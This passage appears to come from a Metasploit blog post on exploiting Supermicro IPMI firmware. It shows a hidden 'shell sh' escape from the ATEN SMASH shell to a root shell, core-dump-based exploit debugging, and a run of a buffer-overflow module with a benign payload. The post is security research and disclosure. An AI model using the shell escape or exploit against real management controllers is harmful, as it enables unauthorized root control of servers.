Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved

-> help
/

  The managed element is the root

  Verbs :
  cd
  show
  help
  version
  exit

->
 

SSH access provides a restricted SMASH System Management Shell, which indeed isn't very useful for environment inspection or exploit debugging. Even though neither the command line help nor the DMTF's SMASH specification was very encouraging, we had access to the firmware and the ATEN SMASH binaries. Fortunately, after digging around them a little, something interesting was found. While following the code responsible for handling the command line, close to the parsing of pipe ("|") and semicolon (";") characters, the parsing of the next keywords is found:

 

[Figure shell_command.png: disassembly of the SMASH command-line handler, showing the keyword table that includes "shell"]

Especially interesting is the reserved word "shell", so time for a new test:

 

-> shell test
Change shell to test
changing shell fails.: No such file or directory

->
 

Interesting! So it looks like a shell command does exist. A little more static analysis reveals that the shell command not only exists, but should easily allow arbitrary command execution:

 

[Figure shell_exec.png: disassembly of the SMASH "shell" command handler]

Time to test:

 

-> shell ls
Change shell to ls
SFCB        bin        dropbear    lib        lost+found  proc        sys        usr        web
SMASH      dev        etc        linuxrc    nv          sbin        tmp        var        wsman

->
 

Looks good, one more test...

 

-> shell sh
Change shell to sh
# uname -a
Linux (none) 2.6.17.WB_WPCM450.1.3 #5 Wed Apr 24 10:53:55 PDT 2013 armv5tejl unknown
#
 

And a root shell opens in front of us! (The SMT_X9_315 firmware fixes the "shell sh" escape.) With a root shell available, in order to finish the development of the exploit we chose to configure the generation of core dumps into the /tmp folder, which is mounted read-write with enough space available:

 

# mount
rootfs on / type rootfs (rw)
/dev/root on / type cramfs (ro)
proc on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /tmp type tmpfs (rw)
devpts on /dev/pts type devpts (rw)
/dev/mtdblock1 on /nv type jffs2 (rw)
none on /tmp type tmpfs (rw)
/dev/mtdblock4 on /web type cramfs (ro)
# df -h
Filesystem                Size      Used Available Use% Mounted on
rootfs                  20.0M    20.0M        0 100% /
/dev/root                20.0M    20.0M        0 100% /
none                    36.0M      1.1M    34.9M  3% /tmp
/dev/mtdblock1            1.3M    320.0k    960.0k  25% /nv
none                    36.0M      1.1M    34.9M  3% /tmp
/dev/mtdblock4            3.9M      3.9M        0 100% /web
 

To extract the core dumps we used openssl s_server and the device's legitimate web server certificate to set up a minimal HTTPS server, allowing external access to the /tmp directory contents. Several core dumps later we were able to make the exploit work smoothly on the real device:


msf exploit(smt_ipmi_close_window_bof) > show options

Module options (exploit/linux/http/smt_ipmi_close_window_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT                     yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting                        Required  Description
   ----  ---------------                        --------  -----------
   CMD   echo metasploit > /tmp/metasploit.txt  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214


msf exploit(smt_ipmi_close_window_bof) > rexploit
[*] Reloading module...

[*] - Sending exploit...
[*] Exploit completed, but no session was created.

 

Checking the proof of success on the Supermicro device:

 

ATEN SMASH-CLP System Management Shell, version 1.04
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved


-> shell sh
Change shell to sh
# cd /tmp
# pwd
/tmp
# cat metasploit.txt
metasploit
 

Definitely, if you are using a Supermicro motherboard, you should review the information and updates in the Supermicro IPMI Firmware Vulnerabilities article, and apply the vendor's updates if necessary.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.
